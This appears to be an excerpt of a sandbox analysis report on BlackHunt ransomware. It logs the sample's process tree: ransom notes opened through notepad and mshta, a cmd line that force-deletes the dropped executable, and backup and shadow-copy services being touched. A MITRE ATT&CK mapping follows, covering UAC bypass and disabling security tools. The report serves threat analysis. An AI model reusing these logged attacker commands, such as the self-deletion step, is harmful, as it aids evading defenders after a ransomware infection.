"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt
2⤵
PID:1996

C:\Windows\system32\notepad.exe
notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt
3⤵
PID:2400

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta
2⤵
- Checks computer location settings
- Modifies registry class
PID:4972

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
3⤵
PID:4976

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c start /min cmd /c del /F C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
2⤵
PID:908

C:\Windows\SysWOW64\cmd.exe
cmd /c del /F C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
3⤵
PID:1908

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3992

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4116

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:1544

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
- Checks SCSI registry key(s)
PID:440

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Bypass User Account Control

T1088

Scheduled Task

T1053

Defense Evasion

Modify Registry

Disabling Security Tools

T1089

Bypass User Account Control

T1088

Indicator Removal on Host

T1070

File Deletion

T1107

Credential Access

Discovery

Query Registry

System Information Discovery